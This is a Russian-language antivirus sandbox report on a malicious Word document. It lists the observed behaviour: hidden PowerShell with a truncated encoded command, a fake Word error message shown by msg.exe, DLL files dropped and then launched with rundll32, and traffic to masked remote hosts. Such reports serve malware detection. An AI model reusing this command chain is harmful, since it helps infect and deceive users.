Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -ENCOD IABzAEUAVAAtAEkAdABlAE0AIAB2AGEAUgBJAGEAYgBsAGUAOgBDAFkAUgBkACAAIAAoACAAIABbAFQAWQBQAEUAXQAoACIAewA0AH0AewAwAH0AewAxAH0AewAyAH0AewAzAH0AewA1AH0AIgAgAC0ARgAgACcA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1500
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\1187994.cvr
- %HOMEPATH%\pe3mvit\k9taq54\t1ox_wf.dll
Сетевая активность
TCP
- 'es#####.gratiaetsalus.it':443
- '77.##0.64.39':443
UDP
- DNS ASK es#####.gratiaetsalus.it
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IABzAEUAVAAtAEkAdABlAE0AIAB2AGEAUgBJAGEAYgBsAGUAOgBDAFkAUgBkAC...
- '<SYSTEM32>\msg.exe' user /v Word experienced an error trying to open the file.
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\Pe3mvit\K9taq54\T1ox_wf.dll 0
